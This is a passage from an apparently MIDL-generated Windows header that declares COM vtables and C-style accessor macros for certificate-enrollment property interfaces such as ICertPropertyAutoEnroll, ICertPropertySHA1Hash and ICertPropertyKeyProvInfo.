        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyAutoEnroll * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyAutoEnroll * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyAutoEnroll * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateName )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyAutoEnrollVtbl;

    interface ICertPropertyAutoEnroll
    {
        CONST_VTBL struct ICertPropertyAutoEnrollVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyAutoEnroll_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyAutoEnroll_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyAutoEnroll_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyAutoEnroll_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyAutoEnroll_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyAutoEnroll_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyAutoEnroll_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyAutoEnroll_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyAutoEnroll_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyAutoEnroll_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyAutoEnroll_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyAutoEnroll_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyAutoEnroll_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyAutoEnroll_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyAutoEnroll_Initialize(This,strTemplateName)	\
    ( (This)->lpVtbl -> Initialize(This,strTemplateName) ) 

#define ICertPropertyAutoEnroll_get_TemplateName(This,pValue)	\
    ( (This)->lpVtbl -> get_TemplateName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyAutoEnroll_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyRequestOriginator_INTERFACE_DEFINED__
#define __ICertPropertyRequestOriginator_INTERFACE_DEFINED__

/* interface ICertPropertyRequestOriginator */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyRequestOriginator;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab333-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyRequestOriginator : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strRequestOriginator) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromLocalRequestOriginator( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RequestOriginator( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyRequestOriginatorVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyRequestOriginator * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyRequestOriginator * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyRequestOriginator * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ __RPC__in BSTR strRequestOriginator);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromLocalRequestOriginator )( 
            __RPC__in ICertPropertyRequestOriginator * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestOriginator )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyRequestOriginatorVtbl;

    interface ICertPropertyRequestOriginator
    {
        CONST_VTBL struct ICertPropertyRequestOriginatorVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyRequestOriginator_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyRequestOriginator_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyRequestOriginator_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyRequestOriginator_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyRequestOriginator_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyRequestOriginator_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyRequestOriginator_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyRequestOriginator_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyRequestOriginator_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyRequestOriginator_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyRequestOriginator_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyRequestOriginator_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyRequestOriginator_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyRequestOriginator_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyRequestOriginator_Initialize(This,strRequestOriginator)	\
    ( (This)->lpVtbl -> Initialize(This,strRequestOriginator) ) 

#define ICertPropertyRequestOriginator_InitializeFromLocalRequestOriginator(This)	\
    ( (This)->lpVtbl -> InitializeFromLocalRequestOriginator(This) ) 

#define ICertPropertyRequestOriginator_get_RequestOriginator(This,pValue)	\
    ( (This)->lpVtbl -> get_RequestOriginator(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyRequestOriginator_INTERFACE_DEFINED__ */


#ifndef __ICertPropertySHA1Hash_INTERFACE_DEFINED__
#define __ICertPropertySHA1Hash_INTERFACE_DEFINED__

/* interface ICertPropertySHA1Hash */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertySHA1Hash;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab334-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertySHA1Hash : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRenewalValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SHA1Hash( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertySHA1HashVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertySHA1Hash * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertySHA1Hash * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertySHA1Hash * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRenewalValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SHA1Hash )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertySHA1HashVtbl;

    interface ICertPropertySHA1Hash
    {
        CONST_VTBL struct ICertPropertySHA1HashVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertySHA1Hash_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertySHA1Hash_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertySHA1Hash_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertySHA1Hash_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertySHA1Hash_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertySHA1Hash_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertySHA1Hash_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertySHA1Hash_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertySHA1Hash_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertySHA1Hash_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertySHA1Hash_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertySHA1Hash_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertySHA1Hash_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertySHA1Hash_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertySHA1Hash_Initialize(This,Encoding,strRenewalValue)	\
    ( (This)->lpVtbl -> Initialize(This,Encoding,strRenewalValue) ) 

#define ICertPropertySHA1Hash_get_SHA1Hash(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SHA1Hash(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertySHA1Hash_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyKeyProvInfo_INTERFACE_DEFINED__
#define __ICertPropertyKeyProvInfo_INTERFACE_DEFINED__

/* interface ICertPropertyKeyProvInfo */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyKeyProvInfo;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab336-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyKeyProvInfo : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IX509PrivateKey *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PrivateKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyKeyProvInfoVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyKeyProvInfo * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyKeyProvInfo * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyKeyProvInfo * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        END_INTERFACE
    } ICertPropertyKeyProvInfoVtbl;

    interface ICertPropertyKeyProvInfo
    {
        CONST_VTBL struct ICertPropertyKeyProvInfoVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyKeyProvInfo_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyKeyProvInfo_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyKeyProvInfo_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyKeyProvInfo_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyKeyProvInfo_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyKeyProvInfo_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyKeyProvInfo_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyKeyProvInfo_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyKeyProvInfo_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

